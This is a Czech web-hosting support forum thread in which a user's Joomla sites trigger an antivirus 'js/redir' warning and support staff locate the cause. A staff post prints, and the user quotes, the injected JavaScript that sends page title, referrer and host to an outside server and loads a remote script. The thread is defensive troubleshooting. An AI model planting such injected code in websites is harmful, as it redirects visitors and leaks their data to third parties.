#1 2016-04-08 13:59:06

zdenekcz
Člen
Registrován: 2012-08-20
Příspěvky: 20

vir na stránce js/redir

Dobrý den,

na všech mých doménách, na nichž mám nastaven free hosting, mě vždy avg zablokuje přístup na stránku, s tím že je tam vir "js/redir".

Jedná se o domény -> cnchelp.cz, cncpartner.cz a bezpecneodrazedlo.cz. Na všech je nainstalovaná joomla.

Zkoušel jsem nahrát zálohy března, ale problém stále přetrvává.

Můžete mi prosím poradit co s tím?

Předem moc děkuji.

Offline

#2 2016-04-08 14:30:06

jiriolah
Podpora
Registrován: 1970-01-01
Příspěvky: 307

Re: vir na stránce js/redir

Nevyvolává falešný poplach AdBlock Plus v Mozille? https://support.mozilla.org/cs/questions/946155

Edit: U nás vypadá web čistě, což ale nemusí být uplně 100% tvrzení.

Offline

#3 2016-04-08 14:57:14

zdenekcz
Člen
Registrován: 2012-08-20
Příspěvky: 20

Re: vir na stránce js/redir

vyzkoušeno v Chromu, Opeře i Mozille (AdBlock nepoužívám)

Ještě to vyzkouším na pc, kde není nainstalované AVG, jestli to nemůže být tím....

Offline

#4 2016-04-08 15:25:12

PetrAndel
Podpora
Registrován: 2015-07-27
Příspěvky: 522

Re: vir na stránce js/redir

Na všech třech stránkách je tento podezřelý kus kódu:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.teak71.it/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Offline

#5 2016-04-11 20:45:19

zdenekcz
Člen
Registrován: 2012-08-20
Příspěvky: 20

Re: vir na stránce js/redir

vyzkoušeno na pc s avastem a stejný problém


PetrAndel napsal:

Na všech třech stránkách je tento podezřelý kus kódu:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.teak71.it/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Nějaká rada, co s tím? Mě antivirák pustil jen jednou stáhnout soubory z ftp do pc, teď už nemám šanci.....

Offline

#6 2016-04-12 08:16:51

PetrAndel
Podpora
Registrován: 2015-07-27
Příspěvky: 522

Re: vir na stránce js/redir

Nejlépe kód odstranit.
Zdá se že stejný kus kódu je na všech webech na Vašem účtu, v souboru index.php každého templatu, tzn například:
/cnchelp.cz/web/templates/testa/index.php
/cnchelp.cz/web/templates/td_esgat/index.php
/cnchelp.cz/web/templates/beez3/index.php
/bezpecneodrazedlo.cz/web/templates/protostar/index.php

atd atd...

Offline

Zápatí

Založeno na FluxBB | CZ a SK